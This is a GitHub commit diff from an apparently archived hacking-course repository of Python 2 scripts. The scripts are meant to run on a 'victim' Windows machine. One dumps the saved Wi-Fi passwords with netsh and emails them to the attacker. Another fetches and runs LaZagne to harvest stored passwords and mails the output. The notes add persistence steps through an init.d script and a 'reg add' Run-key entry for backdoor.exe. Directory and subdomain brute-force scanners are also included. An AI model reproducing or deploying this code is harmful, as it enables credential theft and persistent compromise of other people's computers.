Skip to content
This repository was archived by the owner on Aug 24, 2023. It is now read-only.

Commit 0f93525

Browse files
author
root
committed
Updated
1 parent 4fa67ef commit 0f93525

Some content is hidden

Large Commits have some content hidden by default. Use the searchbox below for content that may be hidden.

48 files changed

+23363
-61
lines changed

10 arpspoof_detector/arpspoof_detector.py

Lines changed: 3 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -1,4 +1,7 @@
11
#!/usr/bin/python2
2+
#put the script in startup folder to run when the system boots
3+
#put in /etc/init.d/script.py make executable sudo chmod 755 /etc/init.d/scipt.py
4+
#Register script to be run at startup sudo update-rc.d superscript defaults
25

36
import scapy.all as scapy
47

11 execute_sys_cmd_report/report_windows_wifipassword_toemail.py renamed to 11 execute_sys_cmd_report/report_windows_wifi_password_to_email.py

Lines changed: 5 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -1,4 +1,6 @@
11
#!/usr/bin/python2.7
2+
#copy the script to victim machine this scripts should run on victim side windows_host
3+
#get saved wifi password and send a gather information to the mail address mention in the script
24

35
import subprocess
46
import smtplib
@@ -18,9 +20,10 @@ def send_mail(email,password,message):
1820

1921
result = ""
2022
for network_name in network_names_list:
21-
command = "netsh wlan show profile" +network_name+" key=clear"
23+
command = "netsh wlan show profile %s key=clear"%network_name
24+
#to get each and every network saved in the system
2225
current_result = subprocess.check_output(command,shell=True)
2326
result = result + current_result
2427

2528

26-
send_mail("mail@gmail.com","password",result)
29+
send_mail("user@mail.com","password",result)

13 recover_saved_passwd_on_target/download_lazagne_execute_report_toemail.py renamed to 13 recover_saved_passwd_on_target/report_windows_saved_password_to_email.py

Lines changed: 7 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -1,4 +1,9 @@
11
#!/usr/bin/python2.7
2+
#The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer.
3+
#https://github.com/AlessandroZ/LaZagne download this LaZagne file
4+
#it works on Windows, linux, mac but in this script we use lazagne.exe to recover passwords
5+
#copy the script to victim machine this scripts should run on victim side windows_host
6+
27

38
import requests
49
import subprocess
@@ -26,6 +31,8 @@ def send_mail(email,password,message):
2631
temp_directory = tempfile.gettempdir()
2732
os.chdir(temp_directory)
2833
download("http://localhost where lazagne .exe is stored")
34+
#host lazagne.exe on webserver put that link to download the lazagne.exe or
35+
#copy the lazagne.exe to victim and run his script in that path
2936
result = subprocess.check_output("lazagne.exe all",shell=True)
3037
send_mail("[email protected]","password",result)
3138
os.remove("lazagne.exe")

16 pyinstaller/pyinstaller.txt

Lines changed: 5 additions & 10 deletions
Original file line numberDiff line numberDiff line change
@@ -1,6 +1,6 @@
11
pyinstaller
22

3-
install pyinstaller to convert and pack all python code into 1 executable for the targetted operating system
3+
install pyinstaller to convert and pack all python code into 1 executable for the target operating system
44

55
pip install pyinstaller
66
#for linux
@@ -29,7 +29,7 @@ subprocess.check_output(commmad,shell=True,stderr=subprocess.DEVNULL,stdin=subpr
2929
DEVNULL = open(os.devnull,"wb")
3030
subprocess.check_output(commmad,shell=True,stderr=DEVNULL,stdin=DEVNULL)
3131

32-
To create a Python Executable it better to do that os environment
32+
To create a Python Executable it better to do in the same os environment similar to your target
3333
that is to run a py executable in windows
3434
create the py exe in windows operating system with the required lib and modules is installed and then put the py exe in victim system to run
3535

@@ -47,17 +47,12 @@ pip install in windows interpreter of linux
4747

4848
~/.wine/drive_c/Python27/wine python.exe -m pip install pyinstaller
4949

50+
51+
5052
Maintain persistent by puting the script in startup when the os boot these scripts always gets loaded
5153

5254
in windows Registry
5355
Computer\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
5456

5557
in cmd prompt we can change value
56-
reg add HKCV\Software\Microsoft\Windows\CurrentVersion\Run /v name /t REG_SZ /d "location of backdoor.exe"
57-
58-
Trojans
59-
60-
Trojans is a file that looks and function like a normal file like image,pdf,song
61-
62-
when the user clicks on it the image open on foreground and script run invisible in background
63-
58+
reg add HKCV\Software\Microsoft\Windows\CurrentVersion\Run /v name /t REG_SZ /d "location of backdoor.exe"
File renamed without changes.

17 crawler/crawler_1.py

100644100755
File mode changed.

17 crawler/crawler_2.py

100644100755
File mode changed.

17 crawler/crawler_3.py

Lines changed: 0 additions & 26 deletions
This file was deleted.
Lines changed: 32 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,32 @@
1+
#!/usr/bin/python2.7
2+
#discover hidden directory by bruteforceing common directory name
3+
#if we get a respond then their is a directory then we also get the recursive of the directory.
4+
5+
import requests
6+
7+
def request(url):
8+
try:
9+
return requests.get("http://" + url)
10+
except requests.exceptions.ConnectionError:
11+
pass
12+
13+
path=[]
14+
def dirdiscover(url):
15+
with open("common_dir.txt","r") as wordlist_file:
16+
for line in wordlist_file:
17+
word = line.strip()
18+
test_url = url + "/" + word
19+
response = request(test_url)
20+
if response :
21+
print "[+] Discovered URL ----> " + test_url
22+
path.append(word)
23+
24+
url="192.168.44.101/mutillidae"
25+
#edit the url you want to scan
26+
dirdiscover(url)
27+
28+
#recursively gothrough each and every path
29+
for paths in path:
30+
dirdiscover(url+"/"+ paths)
31+
32+

17 crawler/testing_google_subdomain/crawler_1.py renamed to 17 crawler/testing_google_subdomain/discover_subdomains_of_domain.py

Lines changed: 7 additions & 5 deletions
Original file line numberDiff line numberDiff line change
@@ -1,4 +1,6 @@
1-
#!/usr/bin/python
1+
#!/usr/bin/python2.7
2+
#dicover subdomains of domain by bruteforcing common sub domains to the domain and
3+
#if we get a respond then the sub-domain exist
24

35
import requests
46
from datetime import datetime
@@ -12,20 +14,20 @@ def request(url):
1214
pass
1315

1416
target_url = "google.com"
15-
subdomain_list = []
17+
#subdomain_list = []
1618
file = open("googlesubdomain.txt","aw")
17-
with open("subdomain19","r") as wordlist_file:
19+
with open("top_10_subdomain.txt","r") as wordlist_file:
1820
for line in wordlist_file:
1921
word = line.strip()
2022
test_url = word + "." + target_url
2123
response = request(test_url)
2224
if response :
2325
print "[+] Discovered subdomain ----> "+test_url
24-
subdomain_list.append(test_url)
26+
#subdomain_list.append(test_url)
2527
file.write(test_url+"\n")
2628
file.close()
2729

2830
stop=datetime.now()
2931

3032
totaltime=stop-start
31-
print "TotalTime = ",totaltime
33+
print "\n[***]TotalTimeTaken = ",totaltime

0 commit comments

Comments
 (0)